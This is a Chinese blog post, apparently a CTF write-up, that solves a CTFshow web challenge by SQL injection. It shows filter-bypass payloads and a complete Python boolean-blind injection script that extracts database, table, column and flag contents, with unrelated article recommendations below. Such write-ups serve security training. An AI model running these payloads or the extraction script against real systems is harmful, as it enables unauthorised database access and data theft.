CTFshow-web-wbe8

最新推荐文章于 2024-10-13 19:04:04 发布
最新推荐文章于 2024-10-13 19:04:04 发布
阅读量61 收藏
点赞数
分类专栏: CTFshow 文章标签: python sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_68581192/article/details/133780201
版权

CTFshow-web-wbe8

经过一系列payload的尝试后,发现本题过滤了空格、union、and、逗号等
打开靶场,显示如下
在这里插入图片描述
首先确定注入点,输入以下payload使SQL恒成立

?id=-1/**/or/**/true#

由于SQL恒成立,数据库将查询出表中的所有内容,并返回到前端,显示如下
在这里插入图片描述
输入以下payload,使SQL恒不成立

?id=-1/**/or/**/false#

由于SQL恒不成立,数据库查询不到任何数据,从而导致页面显示为空,显示如下
在这里插入图片描述
由上可知该页面存在SQL注入漏洞,且类型为数值型注入
经过一系列payload的尝试后,发现本题过滤了空格、union、and、逗号等,这也意味着无法使用联合查询了,那么此时就需要我们编写脚本来解决

import requests

url = 'http://42663f6e-29cf-493e-9d72-80872db16864.challenge.ctf.show/index.php?id=-1/**/or/**/'
name = ''

# 循环100次( 循环次数按照返回的字符串长度自定义)
for i in range(1, 80):
    # 获取当前使用的数据库
    # payload = 'ascii(substr(database()from/**/%d/**/for/**/1))=%d'
    # 获取当前数据库的所有表
    # payload = 'ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from/**/%d/**/for/**/1))=%d'
    # 获取flag表的字段
    # payload = 'ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666C6167)from/**/%d/**/for/**/1))=%d'
    # 获取flag表的数据
    payload = 'ascii(substr((select/**/flag/**/from/**/flag)from/**/%d/**/for/**/1))=%d'
    count = 0
    print('正在获取第 %d 个字符' % i)
    # 截取SQL查询结果的每个字符, 并判断字符内容
    for j in range(31, 128):
        result = requests.get(url + payload % (i, j))
        if 'If' in result.text:
            name += chr(j)
            print('数据库名/表名/字段名/数据: %s' % name)
            break

        # 如果某个字符不存在,则停止程序
        count += 1
        if count >= (128 - 31):
            exit()

代码跑一会,flag出现
在这里插入图片描述

T大白兔奶糖
关注
专栏目录
[ctfshow]web入门——命令执行(web54-web71)
ShenZ的博客
12-01 4346
文章目录web54 web54
W5500网络参数-web修改_终版.rar
06-09
标题中的"W5500网络参数-web修改_终版.rar"指示了这是一个关于使用W5500网络芯片进行网络参数配置并通过Web界面进行修改的最终版本项目。这个压缩包可能包含了实现这一功能的所有源代码、文档和其他相关资源。 ...
ctfshow-WEB-web2
热门推荐
wangyuxiang946的博客
08-19 1万+
ctf.show WEB模块第2关是一个SQL注入漏洞,请求方式是POST请求,注入点是单引号字符型注入,flag就藏在当前的数据库的flag表中,使用联合注入获取数据即可 在用户名的输入框中输入万能账号a' or true #,密码随便输 登录成功,万能账号生效了,并且把查询到的用户名显示到了页面中,既然有显示位,那我们就用联合注入进行脱库 首先,测试一下回显的位置,在用户名的输入框中输入一下payload,密码还是随便输 a' union select 1,2...
ctfshow-web9
aarong的博客
12-25 1753
如题又是登录框,这次尝试了前面几题方法都没方法做出来,只好换一种思路,先对这网站的后台进行扫描(这里使用了很多种扫描工具比如dirb、dirbbuster都太拉了,扫了个寂寞,最后还是使用了下面这个工具扫出来的) dirsearch扫描网站目录: dirsearch -u http://079eb967-1867-4064-85b7-ee3490881e14.challenge.ctf.show/ 扫描时间比较久,可以打一两把游戏再来看结果。扫描发现网站目录中存在robots.txt 打开robots.
《CTFshow-Web入门》05. Web 41~50
学习学习学习......
04-10 1561
eval() 利用与正则绕过,或运算【|】构造可用字符、system() 利用与正则绕过,{>/dev/null 2>&1} 绕过。
ctfshow web41-web50
m0_73721944的博客
04-24 1186
web41代码审计过滤了:[0-9] [a-z] ^ + ~ $ [ ] { } & -这次字母过滤了,字符不是很多思路:通过特殊字符来构造字母从而实现代码执行这里根据题目提示已经给了一篇博客第一个脚本运行结果是解释一下是怎么得来的:A %40 %01十六进制的40=十进制的64=二进制0100 0000十六进制的01=十进制的01=二进制0000 0001二者进行或运算0100 00000000 00010100 0001不理解的话可以具体去看一下这个网址带着的表运行结果。
Ctfshow web入门 nodejs篇 web334-web344
Jay17的博客
07-06 1834
Ctfshow web入门 nodejs篇 web334-web344
CTFshow wbe41 教你写脚本
ChenD的学习笔记
11-09 2137
CTFshow web41 如何写一个脚本!脚本原理!
ctfshow web41
m0_69289738的博客
09-06 234
编写脚本构造的字符串 system 和 ls。现在直接构造cat flag.php代替ls。可以用|进行或运算将不可见字符变为可见字符。看源代码,可知道|和""是可以使用的。如s=url解码(%13|%60)最后post传参拿到flag。用bp进行post传参。发现了flag.php。
CTF秀web2
天天学安全专属博客
11-20 1038
CTF秀web2,union注入详解
java-web_学生管理系统(完成实现三成架构)
06-25
具体步骤如下: 1,设计数据表 2,在项目的JavaBean包中增加.上面数据表对应的类 3,在Dao层创建***dao接口,并设计关于数据表数据的增删改查等操作方法。 4,定义一个类实现上面的接口 5,在前台页面success.jsp中...
python中zip()与zip(*)的用法解析
m0_51579041的博客
10-08 289
zip()与zip(*)的用法解析
gligen安装部署笔记
jacke121的专栏
10-08 272
gligen安装部署笔记
解决IE中a标签中的图片有边框
weixin_41674235的博客
10-08 222
‌1、通过CSS去除边框‌:在CSS中为img标签添加border:0 none;样式,例如:img{border:0 none;这种方法适用于大多数现代浏览器‌12。3‌、通过JavaScript去除点击后的虚线框‌:在a标签中添加outline:none;和text-decoration:none;这可以同时去除点击后的虚线框和下划线‌。
文本区域分割系统源码&数据集分享
lzmlzm89的博客
10-08 1332
数据集信息展示在现代计算机视觉领域,文本区域分割的研究日益受到重视,尤其是在处理文档图像和名片等场景时。为此,我们构建了一个名为“more2”的数据集,旨在为改进YOLOv8-seg模型提供丰富的训练素材,以提升其在文本区域分割任务中的表现。该数据集包含五个类别,具体包括“0”、“2”、“business-name-card”、“doc”和“wendang”,每个类别均具有独特的特征和应用场景,能够为模型的训练提供多样化的样本。
python入门到精通专题】8.装饰器
最新发布
情不知所起一往而深
10-13 503
什么是property属性?一种用起来像是使用的实例属性一样的特殊属性,可以对应于某个方法。class Foo:pass# 定义property属性@propertypassfoo_obj.func() # 调用实例方法foo_obj.prop # 调用property属性@propertyreturn 100定义时,在实例方法的基础上添加 @property 装饰器;并且仅有一个self参数调用时,无需括号。
Backend - Java 基础
是萝卜干呀的博客
10-11 809
知识量决定了未来能走多远
python安装第三方库的问题与解决方法
WANGWUSAN66的博客
10-10 726
大部分第三方库都是在国外网站,如果直接使用pip install 包名,下载速度会很慢,这对一些大型包是很致命的,如果下载中断则需要重头再来。安装某些包时,进行到一半出现构建wheel错误,这可能由于某些神秘的原因造成的,非常让人恼火。有些包(如rasterstats)既不能通过pip安装,在2中的网站也找不到,该怎么办?在python第三方库综合网站上搜索这个包,手动下载whl文件,下载完成后使用。解决方案:使用国内镜像(如清华镜像下载),速度很容易达到1M以上;
ensp 交换机配置wbe
10-10
以下是在 ensp 交换机上配置 web 界面的步骤: 1. 连接 ensp 交换机并登录到 CLI 交互界面。 2. 输入 system-view 进入系统视图。 3. 输入 http server enable 启用 web 服务器。 4. 输入 http server access-address { ip-address | vlan vlan-id } 命令指定 web 服务器的 IP 地址或 VLAN ID。 5. 输入 http secure-server enable 开启 HTTPS 安全访问。 6. 输入 user-interface vty 0 4 进入虚拟终端视图。 7. 输入 protocol inbound ssh/http/https 允许 SSH 或 HTTP 或 HTTPS 访问。 8. 输入 quit 返回到系统视图。 9. 输入 aaa 启用 AAA 认证。 10. 输入 local-user admin password irreversible-cipher 密码 设置管理员账户和密码。 11. 输入 local-user admin service-type http/https 允许管理员账户通过 HTTP 或 HTTPS 访问系统。 12. 配置完成后,可以在浏览器中输入 ensp 交换机的 IP 地址或者域名来访问 web 界面。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值